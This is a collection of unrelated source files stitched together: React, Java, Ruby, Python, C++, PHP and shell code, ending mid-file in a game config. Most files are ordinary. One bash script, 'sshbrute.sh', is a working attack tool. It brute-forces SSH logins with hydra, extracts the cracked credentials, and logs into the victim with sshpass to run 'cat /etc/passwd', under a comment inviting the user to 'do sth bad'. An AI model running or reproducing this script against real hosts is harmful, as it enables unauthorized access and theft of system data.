 * HTTPS instead of plain HTTP. The annotation carries no members; its mere
 * presence (readable at runtime via {@link RetentionPolicy#RUNTIME}) is the
 * signal the REST client checks.
 *
 * @author zxy
 */
@Target({ElementType.TYPE, ElementType.METHOD})
@Retention(RetentionPolicy.RUNTIME)
@Documented
public @interface HttpsSupported {
//---------------------
// EMPTY BODY
//---------------------
}
|
<reponame>RiyaGupta89/project-zone
import React,{useState} from 'react';
import { useDataLayerValues } from "../../datalayer";
import { ToastContainer, toast } from 'react-toastify';
import { sendmessage } from './../../axios/instance';
import ParticlesBg from 'particles-bg';
import './contactus.css';
export default function ContactUs() {
const [{ user }, dispatch] = useDataLayerValues();
const [fields, setFields] = useState({
fullname: `${user.fname} ${user.lname}`,
email: user.email,
message:" "
});
const { fullname, email, message } = fields;
const handleChange = (e) => {
const { name, value } = e.target;
setFields((prevState) => {
return {
...prevState,
[name]: value,
};
});
};
const handleSubmit = async (e) =>
{
e.preventDefault();
const emailTest = /^[^\s@]+@[^\s@]+\.[^\s@]{2,}$/i;
if (!fullname){
toast.error("Please enter your Full Name");
} else if (email.trim() === " "){
toast.error("Please enter your email");
} else if (!emailTest.test(email)) {
toast.error('Please enter a valid email');
} else if (!message) {
toast.error('Please write a message/feedback to connect with us');
} else{
sendMessage(fullname, email, message);
clearFields();
}
};
const sendMessage = async (fullname, email, message) => {
const body = {
fullname: fullname,
email: email,
message:message
};
try {
const res = await sendmessage(body);
if (!res.data.error && res.data.success) {
toast.success(`Message sent successfully ! Check your mailbox to find response sent by us`);
}
} catch (err) {
if (err.response) {
toast.error(`${err.response.data.error}`);
}
}
}
const clearFields = () => {
setFields({
message:" "
});
};
return (
<section className = "contact_section" >
<ParticlesBg type = "coweb"
bg = {true}
/>
<div className = "contact__left" >
</div>
<div className = "contact__right" >
<ToastContainer position="bottom-right" />
<form onSubmit={handleSubmit}>
<div className = "inputBox" >
<label className = "label" > Full Name </label>
<input type = "text"
name = "fullname"
value={fullname}
onChange={handleChange}
className = "contact__input"
placeholder = "E.g. <NAME>"
required />
</div>
<div className = "inputBox" >
<label className = "label" > Email </label>
<input type = "email"
name = "email"
value={email}
onChange={handleChange}
className = "contact__input"
placeholder = "e.g <EMAIL>"
required />
</div>
<div className = "inputBox">
<label className = "label"> Message </label>
<textarea
name = "message"
value={ message }
onChange={handleChange}
className = "contact__textarea"
placeholder = "Message"
rows = "3"
required />
</div>
<button type="submit" className = "submitBtn"><span> Send </span></button>
</form>
</div>
</section>
)
} |
<filename>spec/specs.js
describe("Ticket", function() {
  it("creates a ticket that specifies movie title, time, and user's age based on input", function() {
    var testTicket = new Ticket("Trainspotting", "5:00", 34, 1);
    // BUGFIX: the original asserted on `testTicket.titlee` (typo), which is
    // undefined and could never equal the expected title.
    expect(testTicket.title).to.equal("Trainspotting");
    expect(testTicket.time).to.equal("5:00");
    expect(testTicket.age).to.equal(34);
    expect(testTicket.quantity).to.equal(1);
  });
  it("creates ticket that calculates twenty percent price discount if user age is over 65", function() {
    var testTicket = new Ticket("Trainspotting", "5:00", 70, 1);
    expect(testTicket.price()).to.equal(8);
  });
  it("creates ticket that calculates twenty percent price discount if user attends before 4:00", function() {
    var testTicket = new Ticket("Trainspotting", "2:00", 34, 1);
    expect(testTicket.price()).to.equal(8);
  });
  it("creates ticket that calculates twenty percent price discount if user attends older movie", function() {
    var testTicket = new Ticket("12 Angry Men", "5:00", 34, 1);
    expect(testTicket.price()).to.equal(8);
  });
  it("creates ticket that calculates total price based on quantity", function() {
    var testTicket = new Ticket("12 Angry Men", "5:00", 34, 2);
    expect(testTicket.price()).to.equal(16);
  });
});
|
package junit;
import static org.junit.jupiter.api.Assertions.*;
import java.util.Random;
import org.junit.jupiter.api.Test;
import main.MyString1;
/**
 * Unit tests for {@link main.MyString1}, a hand-rolled string class backed by
 * a char[]. Several tests use random indices/values to probe the whole range.
 *
 * @author <NAME>
 *
 */
public class MyString1Test
{
// Source of random indices/integers used across tests.
Random random = new Random();
// Fixture: the backing array and the MyString1 built from it.
final char[] myString = {'J', 'a', 'v', 'a'};
final MyString1 myString1 = new MyString1(myString);
/**
 * Test method for {@link main.MyString1#charAt(int)} with a valid index.
 * Picks a random in-range index and compares against the backing array.
 */
@Test
public void testCharAtWithAValidIndex()
{
if (myString1.length() > 0)
{
int randomIndex = random.nextInt(myString1.length());
assertEquals(myString[randomIndex], myString1.charAt(randomIndex));
}
}
/**
 * Test method for {@link main.MyString1#charAt(int)} with invalid indices.
 * Out-of-range access is expected to yield the NUL character, not throw.
 */
@Test
public void testCharAtWithInvalidIndices()
{
assertEquals('\u0000', myString1.charAt(-1));
assertEquals('\u0000', myString1.charAt(myString1.length()));
}
/**
 * Test method for {@link main.MyString1#equals(main.MyString1)} with equal and unequal strings.
 */
@Test
public void testEqualsMyString1WithEqualAndUnequalStrings()
{
MyString1 myString2 = new MyString1(myString);
assertTrue(myString1.equals(myString2));
char[] differentSizeString = {'S', 'c', 'a', 'l', 'a'};
MyString1 differentSizeString1 = new MyString1(differentSizeString);
assertFalse(myString1.equals(differentSizeString1));
}
/**
 * Test method for {@link main.MyString1#equals(main.MyString1)} with lowercased string.
 * "Java" lowercased differs from the original; only the empty string is
 * equal to its lowercased form.
 */
@Test
public void testEqualsMyString1WithLowercasedString()
{
MyString1 lowerCaseString = myString1.toLowerCase();
if (myString1.length() > 0)
{
assertFalse(myString1.equals(lowerCaseString));
}
else
{
assertTrue(myString1.equals(lowerCaseString));
}
}
/**
 * Test method for {@link main.MyString1#substring(int, int)} with valid beginning and ending indices.
 * Compares against java.lang.String#substring on the same data.
 */
@Test
public void testSubstringWithValidBeginEndIndices()
{
if (myString1.length() > 0)
{
int randomBeginIndex = random.nextInt(myString1.length());
MyString1 someSubstring = myString1.substring(randomBeginIndex, myString1.length());
char[] expected = String.valueOf(myString).substring(randomBeginIndex, myString.length).toCharArray();
assertTrue(someSubstring.equals(new MyString1(expected)));
}
assertTrue(myString1.equals(myString1.substring(0, myString1.length())));
}
/**
 * Test method for {@link main.MyString1#substring(int, int)} with invalid beginning and ending indices.
 * Every invalid combination is expected to return the whole string, not throw.
 */
@Test
public void testSubstringWithInvalidBeginEndIndices()
{
assertTrue(myString1.equals(myString1.substring(0, myString1.length() + 2)));
assertTrue(myString1.equals(myString1.substring(myString1.length(), myString1.length() + 2)));
assertTrue(myString1.equals(myString1.substring(2, 1)));
assertTrue(myString1.equals(myString1.substring(myString1.length(), myString1.length())));
assertTrue(myString1.equals(myString1.substring(myString1.length() + 5, myString1.length() + 2)));
assertTrue(myString1.equals(myString1.substring(-5, myString1.length())));
assertTrue(myString1.equals(myString1.substring(-5, myString1.length() + 2)));
assertTrue(myString1.equals(myString1.substring(-2, -5)));
}
/**
 * Test method for {@link main.MyString1#toLowerCase()}.
 * Character-by-character comparison against String#toLowerCase.
 */
@Test
public void testToLowerCase()
{
MyString1 lowerCaseString = myString1.toLowerCase();
String expected = String.valueOf(myString).toLowerCase();
for (int index = 0; index < lowerCaseString.length(); index++)
{
assertEquals(expected.charAt(index), lowerCaseString.charAt(index));
}
}
/**
 * Test method for {@link main.MyString1#valueOf(int)} with a random integer.
 * Character-by-character comparison against String#valueOf.
 */
@Test
public void testValueOfWithRandomInteger()
{
int randomInteger = random.nextInt();
MyString1 randomIntegerString = MyString1.valueOf(randomInteger);
String expectedRandomIntegerString = String.valueOf(randomInteger);
for (int index = 0; index < randomIntegerString.length(); index++)
{
assertEquals(expectedRandomIntegerString.charAt(index), randomIntegerString.charAt(index));
}
}
/**
 * Test method for {@link main.MyString1#valueOf(int)} with positive and negative digits.
 * (Method name keeps the original "Postive" spelling to avoid a code change.)
 */
@Test
public void testValueOfWithPostiveAndNegativeDigits()
{
int randomDigit = random.nextInt(10);
assertEquals((char) (randomDigit + '0'), MyString1.valueOf(randomDigit).charAt(0));
MyString1 randomNegativeDigitString = MyString1.valueOf(-randomDigit);
String expectedRandomNegativeDigitString = String.valueOf(-randomDigit);
for (int index = 0; index < randomNegativeDigitString.length(); index++)
{
assertEquals(expectedRandomNegativeDigitString.charAt(index), randomNegativeDigitString.charAt(index));
}
}
}
package data.objects;
import engine.CONST;
import javafx.beans.property.SimpleIntegerProperty;
import javafx.beans.property.SimpleStringProperty;
/**
 * Model object representing an activity, identified by a numeric id and a
 * display name, with JavaFX properties for table binding.
 *
 * <p>Id assignment is driven by a class-wide {@code highestID} counter: new
 * instances default to {@code highestID + 1}, and when
 * {@link #enableHighestID()} is active, loading an instance with a stale id
 * re-assigns it past the current maximum.
 */
public class Activity {
    /* Highest ID loaded in the memory */
    private static int highestID = -1;
    /* When true, constructor-supplied ids <= highestID are replaced with fresh ones. */
    private static boolean highestIDEnabled = false;

    private int id;
    private int order;
    private String name;
    private SimpleStringProperty nameProperty;
    private SimpleIntegerProperty idProperty;

    /** Creates an activity with the next free id. */
    public Activity(String name) {
        this(highestID + 1, name);
    }

    /**
     * Creates an activity with an explicit id.
     * The id also updates (or, when re-assignment is enabled, is replaced
     * from) the class-wide highestID counter.
     */
    public Activity(int id, String name) {
        this.id = id;
        this.name = name;
        /* update highestID */
        if (id > highestID) {
            highestID = id;
        } else if (highestIDEnabled) { // simplified from `== true`
            this.id = ++highestID;
        }
        nameProperty = new SimpleStringProperty();
        idProperty = new SimpleIntegerProperty();
    }

    /** Resets the counter so the next default-constructed activity gets id 0. */
    public static void resetID() {
        highestID = -1;
    }

    /**
     * Id-based equality.
     * NOTE(review): this OVERLOADS rather than overrides Object.equals, so
     * hash-based collections still use identity. Changing the signature would
    * alter behavior for existing callers, so it is kept as-is.
     */
    public boolean equals(Activity act) {
        return (act.getId() == this.getId());
    }

    public static void disableHighestID() {
        highestIDEnabled = false;
    }

    public static void enableHighestID() {
        highestIDEnabled = true;
    }

    public static void resetHighestID() {
        highestID = CONST.DEFAULT_HIGHEST_ID;
    }

    public String toString() {
        return name;
    }

    /* **************************** */
    /*                              */
    /*       GETTERS/SETTERS        */
    /*                              */
    /* **************************** */
    public static int getHighestId() {
        return highestID;
    }

    public String getName() {
        return name;
    }

    public int getId() {
        return id;
    }

    public void setName(String name) {
        this.name = name;
    }

    public int getOrder() {
        return order;
    }

    public void setOrder(int order) {
        this.order = order;
    }

    /** Refreshes and returns the JavaFX id property (lazy sync with the field). */
    public SimpleIntegerProperty idProperty() {
        idProperty.set(id);
        return idProperty;
    }

    /** Refreshes and returns the JavaFX name property (lazy sync with the field). */
    public SimpleStringProperty nameProperty() {
        nameProperty.set(name);
        return nameProperty;
    }
}
|
-- Average salary per job title; the aggregate is aliased so the result
-- column has a stable, referenceable name.
SELECT jobtitle, AVG(salary) AS avg_salary
FROM table
GROUP BY jobtitle;
import cPickle

# Re-save a trained model pickle under a generic filename (Python 2 script).
# Pickle files must be opened in BINARY mode on both read and write — the
# original opened the source in text mode, which corrupts pickles on some
# platforms — and `with` guarantees the handles are closed.
with open('lstm_tanh_relu_[1468202263.38]_2_0.610.p', 'rb') as src:
    model = cPickle.load(src)
with open('model.bin.nlg', 'wb') as dst:
    cPickle.dump(model, dst)
#!/bin/bash
# this script is meant to run all possible modes of SPM/SPMT with the
# interpreter passed to this script to check if they (at least) do not throw
# some runtime exception, poor man's test-suite. SPM/SPMT do not have to be
# installed but their runtime dependencies must be. if it fails it does no
# cleanup! all short arguments are used instead of shortcuts (such as
# -a/--automake) on purpose as the tests are selective due to some restrictions
# and in addition it ensures that on arguments change the tests fail.
set -e
uid="$(id -u)"
curdir="$(dirname "$0")"
rootdir="$curdir/root-$1"
cachedir="$rootdir/cache"
builddir="$rootdir/build"
spmargs="--root $rootdir --cache $cachedir --build $builddir --missing=True --notify=True --scripts=False --permissions=True --debug"
spmtargs="--root $rootdir --debug"
statefile="$rootdir/testrun-$1"
case "$1" in
    *python*) true ;;
    *) echo "Invalid interpreter: $1"
       exit 1 ;;
esac
# Used as `cmd || expectedfailure N`: succeed only when cmd exited with N.
expectedfailure() {
    # BUGFIX: capture the caller's status immediately — "$?" is clobbered by
    # the very next command, so the original's `exit $?` (taken after the
    # [ ] test) always exited 0 and masked unexpected failures.
    local rc=$?
    if [ "$rc" != "$1" ];then
        exit "$rc"
    fi
}
# to ensure that no stray files from previous run are left
make -C "$curdir" clean
mkdir -pv "$rootdir"
touch "$statefile"
# to avoid requirement of installing the libs
ln -svf "$curdir/../libs/libmessage.py" .
ln -svf "$curdir/../libs/libmisc.py" .
ln -svf "$curdir/../libs/libpackage.py" .
# Each test below is resumable: a marker line is appended to $statefile on
# success and checked on the next run so completed stages are skipped.
if ! grep -q "SPM REPO" "$statefile" ;then
echo "=== RUNNING SPM REPO TEST ==="
"$1" "$curdir/spm.py" $spmargs repo -cspu
echo "SPM REPO" >> "$statefile"
else
echo "=== SKIPPING SPM REPO TEST ==="
fi
if ! grep -q "SPM REMOTE" "$statefile" ;then
echo "=== RUNNING SPM REMOTE TEST ==="
"$1" "$curdir/spm.py" $spmargs remote -pnvrdDOmcsob ca-certificates
echo "SPM REMOTE" >> "$statefile"
else
echo "=== SKIPPING SPM REMOTE TEST ==="
fi
if ! grep -q "SPM SOURCE" "$statefile" ;then
echo "=== RUNNING SPM SOURCE TEST ==="
# --depends, --reverse and --remove are not tested!
"$1" "$curdir/spm.py" $spmargs source -Cfpckim ca-certificates
echo "SPM SOURCE" >> "$statefile"
else
echo "=== SKIPPING SPM SOURCE TEST ==="
fi
if ! grep -q "SPM LOCAL" "$statefile" ;then
echo "=== RUNNING SPM LOCAL TEST ==="
"$1" "$curdir/spm.py" $spmargs local -pnvRdDOArsf ca-certificates
echo "SPM LOCAL" >> "$statefile"
else
echo "=== SKIPPING SPM LOCAL TEST ==="
fi
if ! grep -q "SPM WHO" "$statefile" ;then
echo "=== RUNNING SPM WHO TEST ==="
"$1" "$curdir/spm.py" $spmargs who -p ca-certificates
echo "SPM WHO" >> "$statefile"
else
echo "=== SKIPPING SPM WHO TEST ==="
fi
# dist needs root because it stages files into the target root
if [ "$uid" != "0" ];then
echo "=== SKIPPING SPMT DIST TEST (REQUIRES ROOT) ==="
elif ! grep -q "SPMT DIST" "$statefile" ;then
echo "=== RUNNING SPMT DIST TEST (ROOT) ==="
"$1" "$curdir/tools.py" $spmtargs dist -scd "$rootdir" ca-certificates
echo "SPMT DIST" >> "$statefile"
else
echo "=== SKIPPING SPMT DIST TEST (ROOT) ==="
fi
if ! grep -q "SPMT CHECK" "$statefile" ;then
echo "=== RUNNING SPMT CHECK TEST ==="
# --depends and --reverse are not tested!
# exit status 2 is the expected outcome here, anything else aborts
"$1" "$curdir/tools.py" $spmtargs check ca-certificates || expectedfailure 2
echo "SPMT CHECK" >> "$statefile"
else
echo "=== SKIPPING SPMT CHECK TEST ==="
fi
if ! grep -q "SPMT CLEAN" "$statefile" ;then
echo "=== RUNNING SPMT CLEAN TEST ==="
"$1" "$curdir/tools.py" $spmtargs clean
echo "SPMT CLEAN" >> "$statefile"
else
echo "=== SKIPPING SPMT CLEAN TEST ==="
fi
if ! grep -q "SPMT LINT" "$statefile" ;then
echo "=== RUNNING SPMT LINT TEST ==="
"$1" "$curdir/tools.py" $spmtargs lint -musPMfboepnkc ca-certificates
echo "SPMT LINT" >> "$statefile"
else
echo "=== SKIPPING SPMT LINT TEST ==="
fi
if ! grep -q "SPMT SANE" "$statefile" ;then
echo "=== RUNNING SPMT SANE TEST ==="
"$1" "$curdir/tools.py" $spmtargs sane -ednmNvtug ca-certificates
echo "SPMT SANE" >> "$statefile"
else
echo "=== SKIPPING SPMT SANE TEST ==="
fi
# TODO: merge, edit
if ! grep -q "SPMT WHICH" "$statefile" ;then
echo "=== RUNNING SPMT WHICH TEST ==="
"$1" "$curdir/tools.py" $spmtargs which -cp ca-certificates
echo "SPMT WHICH" >> "$statefile"
else
echo "=== SKIPPING SPMT WHICH TEST ==="
fi
if [ "$uid" != "0" ];then
echo "=== SKIPPING SPMT PACK TEST (REQUIRES ROOT) ==="
elif [ ! -d "$rootdir/var/local/spm/ca-certificates" ];then
echo "=== SKIPPING SPMT PACK TEST (CA-CERTIFICATES NOT INSTALLED) ==="
elif ! grep -q "SPMT PACK" "$statefile" ;then
echo "=== RUNNING SPMT PACK TEST ==="
"$1" "$curdir/tools.py" $spmtargs pack -d "$rootdir" ca-certificates
echo "SPMT PACK" >> "$statefile"
else
echo "=== SKIPPING SPMT PACK TEST ==="
fi
# "serve" is blocking and dangerous to run, so it is not tested
if ! grep -q "SPMT DISOWNED" "$statefile" ;then
echo "=== RUNNING SPMT DISOWNED TEST ==="
"$1" "$curdir/tools.py" $spmtargs disowned -cpd "$rootdir"
echo "SPMT DISOWNED" >> "$statefile"
else
echo "=== SKIPPING SPMT DISOWNED TEST ==="
fi
|
#!/bin/bash
# Brute-force SSH credentials for a target with hydra, then demonstrate access
# by running a command over sshpass. For authorized penetration testing only.
if [[ $# -lt 2 ]]; then
    echo "Usage ./sshbrute.sh <IP> <ETHSPLOITER_PATH>"
    exit 1
fi
VICTIM_IP=$1
ETHSPLOITER_PATH=$2
HYDRA_OUT=/tmp/hydra_out
hydra -L "$ETHSPLOITER_PATH/exploits/multi/ssh/login/user" -P "$ETHSPLOITER_PATH/exploits/multi/ssh/login/pass" "ssh://$VICTIM_IP" -o "$HYDRA_OUT"
# hydra writes one header line; a single line therefore means no hit.
PASS_FOUND=$(wc -l < "$HYDRA_OUT")
if [[ $PASS_FOUND -eq 1 ]]; then
    echo "Couldn't log into ssh with login:pass dict"
    exit 1
fi
# Parse the last result line: "... host: H  login: U  password: P"
line=$(tail -n 1 "$HYDRA_OUT")
HOST="$(echo "$line" | sed 's/^.*host: \(.*\)\s\+login: .*$/\1/g')"
USER="$(echo "$line" | sed 's/^.*login: \(.*\)\s\+password: .*$/\1/g')"
PASS="$(echo "$line" | sed 's/^.*password: \(.*\)$/\1/g')"
echo "Cracked: host=$VICTIM_IP user=$USER pass=$PASS"
# ------------------------------------------------------------------------
# DO STH BAD, YOU HAVE ACCESS TO THE SHELL
# ------------------------------------------------------------------------
echo "Executing bad script on $HOST"
sshpass -p "$PASS" ssh "$USER@$VICTIM_IP" "cat /etc/passwd"
# expect -c 'spawn ssh '$USER'@'$VICTIM_IP' "cat /etc/passwd"; expect "assword:"; send "'$PASS'\r"; interact'
|
/**
* Copyright 2014 Transmode AB
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package se.transmode.gradle.plugins.docker.client;
import java.io.File;
import java.util.List;
import java.util.Map;
/**
 * Abstraction over a Docker client implementation (CLI or remote API) used by
 * the Gradle Docker plugin tasks.
 */
public interface DockerClient {

    /**
     * Build a Docker image from the contents of the given directory.
     *
     * @param buildDir the directory from which to build the image
     * @param tag the tag to apply to the image
     * @param pull whether to pull the latest base image: true enables the pull, false disables it
     * @return the output of the command
     */
    String buildImage(File buildDir, String tag, boolean pull);

    /**
     * Push the given image to the configured Docker registry.
     *
     * @param tag the tag of the image to push
     * @return the output of the command
     */
    String pushImage(String tag);

    /**
     * Run the given image in a container with the given name.
     *
     * @param tag the image to run
     * @param containerName the name of the container to create
     * @param detached should the container be run in the background (aka detached)
     * @param autoRemove should the container be removed when execution completes
     * @param env a map containing a collection of environment variables to set
     * @param ports a map containing the ports to publish
     * @param volumes a map containing the volumes to bind
     * @param volumesFrom a list of the containers whose volumes we should mount
     * @param links a list of the containers to which the newly created container should be linked
     * @return the output of the command
     */
    String run(String tag, String containerName, boolean detached, boolean autoRemove,
            Map<String, String> env, Map<String, String> ports, Map<String, String> volumes,
            List<String> volumesFrom, List<String> links);
}
|
#!/usr/bin/env bash
#
# This script builds the application from source for multiple platforms.
set -e
# Static binaries: disable cgo for all cross-compiled targets.
export CGO_ENABLED=0
# Determine the Arch/OS combos we're building for
XC_ARCH=${XC_ARCH:-"386 amd64 arm"}
XC_OS=${XC_OS:-"darwin freebsd linux"}
echo "==> Determining Arch/OS Info..."
# Get Git Commit information
echo "==> Determining Git Info..."
GIT_COMMIT=$(git rev-parse HEAD)
GIT_DIRTY="$(test -n "$(git status --porcelain)" && echo "+CHANGES" || true)"
# LDFlags for Runtime Variables
# NOTE(review): LDFLAGS is assembled here but the gox invocation below passes
# its own -ldflags string instead — NAME/VERSION are presumably injected via
# the environment; confirm whether this block is dead.
LDFLAGS="-s -w"
LDFLAGS="$LDFLAGS -X main.Name=${NAME}"
LDFLAGS="$LDFLAGS -X main.Version=${VERSION}"
LDFLAGS="$LDFLAGS -X main.GitCommit=${GIT_COMMIT}${GIT_DIRTY}"
# Delete the old dir
echo "==> Removing old directory..."
rm -rf pkg/*
# Build!
echo "==> Building..."
"`which gox`" \
-os="${XC_OS}" \
-arch="${XC_ARCH}" \
-osarch="!darwin/arm" \
-ldflags "-X ${GIT_IMPORT}.GitCommit='${GIT_COMMIT}${GIT_DIRTY}' -X ${GIT_IMPORT}.GitDescribe='${GIT_DESCRIBE}'" \
-output "pkg/{{.OS}}-{{.Arch}}-replicator" \
-tags="${BUILD_TAGS}" \
.
|
#!/usr/bin/env bash
# Regenerates Kubernetes client/informer/lister and knative injection code for
# the OpenShift route and Maistra APIs, then refreshes vendored deps.
set -o errexit
set -o nounset
set -o pipefail
# Generate route injection code.
OUTPUT_PKG="github.com/openshift-knative/knative-serving-networking-openshift/pkg/client/openshift/injection" \
VERSIONED_CLIENTSET_PKG="github.com/openshift/client-go/route/clientset/versioned" \
EXTERNAL_INFORMER_PKG="github.com/openshift/client-go/route/informers/externalversions" \
vendor/knative.dev/pkg/hack/generate-knative.sh "injection" \
github.com/openshift/client-go \
github.com/openshift/api \
"route:v1" \
--go-header-file hack/boilerplate.txt
# Generate maistra clients.
vendor/k8s.io/code-generator/generate-groups.sh "client,informer,lister" \
github.com/openshift-knative/knative-serving-networking-openshift/pkg/client/maistra \
github.com/maistra/istio-operator/pkg/apis \
"maistra:v1" \
--go-header-file hack/boilerplate.txt
# Generate maistra injection code.
OUTPUT_PKG="github.com/openshift-knative/knative-serving-networking-openshift/pkg/client/maistra/injection" \
vendor/knative.dev/pkg/hack/generate-knative.sh "injection" \
github.com/openshift-knative/knative-serving-networking-openshift/pkg/client/maistra \
github.com/maistra/istio-operator/pkg/apis \
"maistra:v1" \
--go-header-file hack/boilerplate.txt
# Re-vendor after regeneration so generated imports resolve.
hack/update-deps.sh
/**
 * Returns the median of a numeric array: the middle element after sorting,
 * or the mean of the two middle elements for an even count.
 *
 * The parameter is received by value, so the caller's array is not reordered.
 *
 * @param array $arr_numbers non-empty array of numbers
 * @return int|float
 * @throws InvalidArgumentException when the array is empty (the original
 *         silently indexed a missing element instead)
 */
function findMedian($arr_numbers)
{
    $totalElements = count($arr_numbers);
    if ($totalElements === 0)
    {
        throw new InvalidArgumentException("findMedian() requires a non-empty array");
    }
    sort($arr_numbers);
    // intdiv() makes the integer midpoint explicit; the original relied on
    // PHP silently truncating a float index for odd counts.
    $middle = intdiv($totalElements, 2);
    if ($totalElements % 2 == 0)
    {
        return ($arr_numbers[$middle] + $arr_numbers[$middle - 1]) / 2;
    }
    return $arr_numbers[$middle];
}
#!/bin/sh -l
# Cluster job wrapper: load the GCC 7 + OpenMPI 2.0 toolchain via environment
# modules, then exec the wrapped command with that environment.
set -e
module purge
source /etc/profile
source /etc/profile.d/modules.sh
module unload mpi.intel
module load gcc/7
module load mpi.ompi/2.0/gcc
#module load hdf5/mpi/1.8.17_gcc
# OMPI="/opt/rrzk/lib/openmpi/2.1.1/gcc/bin"
#
# export CC="${OMPI}/mpicc"
# export CXX="${OMPI}/mpicc"
# export FC="${OMPI}/mpifort"
# export F9X="${OMPI}/mpif90"
# export MPI_C_COMPILER="${OMPI}/mpicc"
# export MPI_CXX_COMPILER="${OMPI}/mpicc"
# export MPI_Fortran_COMPILER="${OMPI}/mpifort"
#
# export LD_LIBRARY_PATH="$LD_LIBRARY_PATH:/home/jmarker2/builds/bin/hdf5-1.10.1/lib"
# Replace this shell with the wrapped command so signals/exit codes pass through.
exec "$@"
|
# Join model linking a Photo to an Album, with an explicit display_order that
# determines the photo's position within the album.
class PhotoInAlbum < ApplicationRecord
self.table_name = 'photos_in_albums'
belongs_to :photo, inverse_of: :photo_in_albums
belongs_to :album, inverse_of: :photo_in_albums
validates :photo, :album, presence: true
# A photo may appear at most once per album.
validates :photo, uniqueness: {scope: :album, message: "is already in this album"}
validates :display_order, presence: true, numericality: {only_integer: true, greater_than_or_equal_to: 0}
# Convenience lookup for the join row of a given album/photo pair (nil if absent).
def self.get(album, photo)
PhotoInAlbum.find_by(album_id: album.id, photo_id: photo.id)
end
# 1-based position of this photo inside its album, derived from display_order
# (memoized; counts rows with a smaller display_order).
def position
@position ||= 1 + PhotoInAlbum.where(["album_id = ? AND display_order < ?", album_id, display_order]).count
end
# Pagination page this photo lands on, given the Photo model's per-page size
# (memoized).
def page
@page ||= (position / Photo.default_per_page.to_f).ceil
end
end
|
def normalize_lines(response_list):
    """Extract a line count from entries that mention "line".

    Keeps the original heuristic intact: entries containing the substring
    "line" are collected, the collected list is stringified, and the first
    whitespace-separated token consisting purely of digits is returned as an
    int. Returns 0 when no such token exists.
    """
    matching = [entry for entry in response_list if "line" in entry]
    digit_tokens = [int(token) for token in str(matching).split() if token.isdigit()]
    return digit_tokens[0] if digit_tokens else 0
def convert_to_bytes(size, size_type):
    """Convert a size expressed in KB or MB to bytes.

    Args:
        size: numeric value or numeric string (e.g. "1.5").
        size_type: unit label, either "KB" or "MB".

    Returns:
        int: the size in bytes (decimal units: 1 KB = 1000 B).

    Raises:
        ValueError: for an unsupported unit. The original fell through and
        silently returned None, which would surface later as a confusing
        TypeError at the call site.
    """
    multipliers = {"KB": 1000, "MB": 1000000}
    if size_type not in multipliers:
        raise ValueError("unsupported size unit: %r" % (size_type,))
    return int(float(size) * multipliers[size_type])
def normalize_size(response_list):
    """Parse a size out of a response and normalize it to bytes (int).

    The response is stringified, the token two positions before the first
    unit marker ("Bytes", "KB", "MB" — checked in that order) is taken as the
    numeric value, and KB/MB values are scaled to bytes (decimal units).
    Returns 0 when no unit marker is present.
    """
    text = str(response_list)
    if "Bytes" in text:
        return int(text.split("Bytes")[0].split(" ")[-2])
    if "KB" in text:
        # Inlined KB->bytes conversion (1 KB = 1000 B).
        return int(float(text.split("KB")[0].split(" ")[-2]) * 1000)
    if "MB" in text:
        # Inlined MB->bytes conversion (1 MB = 1e6 B).
        return int(float(text.split("MB")[0].split(" ")[-2]) * 1000000)
    return 0
def normalize_extension(dir_file):
    """Return the file extension of *dir_file*, or "<others>" when it has none."""
    from pathlib import Path  # local import, as in the original
    suffix = Path(dir_file).suffix
    return suffix if suffix else "<others>"
|
<gh_stars>1-10
//https://www.hackerrank.com/challenges/candies
// Scratch array shared across calls; every d[i] for i < n is overwritten by
// the left-to-right pass before it is read.
long d[100001];

// Minimum total candies so that each child gets at least one and any child
// rated higher than an adjacent neighbour gets more than that neighbour.
long candies(int n, vector<int> arr)
{
    d[0] = 1;
    // Left-to-right pass: length of the increasing run ending at i.
    long run = 1;
    for (int i = 1; i < n; i++)
    {
        run = (arr[i] > arr[i - 1]) ? run + 1 : 1;
        d[i] = run;
    }
    // Right-to-left pass: length of the increasing run (towards the left)
    // starting at i; keep the larger of the two constraints.
    run = 1;
    for (int i = n - 2; i >= 0; i--)
    {
        run = (arr[i] > arr[i + 1]) ? run + 1 : 1;
        if (run > d[i])
        {
            d[i] = run;
        }
    }
    long total = 0;
    for (int i = 0; i < n; i++)
    {
        total += d[i];
    }
    return total;
}
|
<gh_stars>10-100
package com.ulfy.master.ui.view;
import android.content.Context;
import android.util.AttributeSet;
import android.view.View;
import android.widget.TextView;
import com.ulfy.android.mvvm.IViewModel;
import com.ulfy.android.ui_injection.Layout;
import com.ulfy.android.ui_injection.ViewById;
import com.ulfy.android.ui_injection.ViewClick;
import com.ulfy.master.R;
import com.ulfy.master.application.vm.GuideVM;
import com.ulfy.master.ui.activity.Guide1Activity;
import com.ulfy.master.ui.activity.Guide2Activity;
import com.ulfy.master.ui.base.BaseView;
// View hosting two entries that open the guide pages; wired up via the
// ulfy ui_injection annotations (@Layout/@ViewById/@ViewClick).
@Layout(id = R.layout.view_guide)
public class GuideView extends BaseView {
@ViewById(id = R.id.guide1TV) private TextView guide1TV;
@ViewById(id = R.id.guide2TV) private TextView guide2TV;
// View model bound via bind(); currently only stored.
private GuideVM vm;
public GuideView(Context context) {
super(context);
init(context, null);
}
public GuideView(Context context, AttributeSet attrs) {
super(context, attrs);
init(context, attrs);
}
private void init(Context context, AttributeSet attrs) {
}
@Override public void bind(IViewModel model) {
vm = (GuideVM) model;
}
/**
 * click: guide1TV
 * Opens guide page 1.
 */
@ViewClick(ids = R.id.guide1TV) private void guide1TV(View v) {
Guide1Activity.startActivity();
}
/**
 * click: guide2TV
 * Opens guide page 2.
 */
@ViewClick(ids = R.id.guide2TV) private void guide2TV(View v) {
Guide2Activity.startActivity();
}
}
// Screeps terminal/market configuration, keyed by room name. RESOURCE_*
// constants are Screeps game globals.
const terminalConfiguration = {
// Tick intervals for the terminal logic.
terminalCheckInterval:100,
terminalSendInterval:200,
// Stock kept back in every room before anything is sold/shipped.
baseReservedEnergy:30000,
baseReservedMineral:10000,
mineralDistributeMinAmount:2500,
// Per-room surplus offered for sale (0 = do not sell).
sellingEnergy:{
"W22N25":0,
"W23N25":0,
"W21N24":0,
"W19N22":0,
"W18N22":0
},
sellingMineral:{
"W22N25":0,
"W23N25":0,
"W21N24":0,
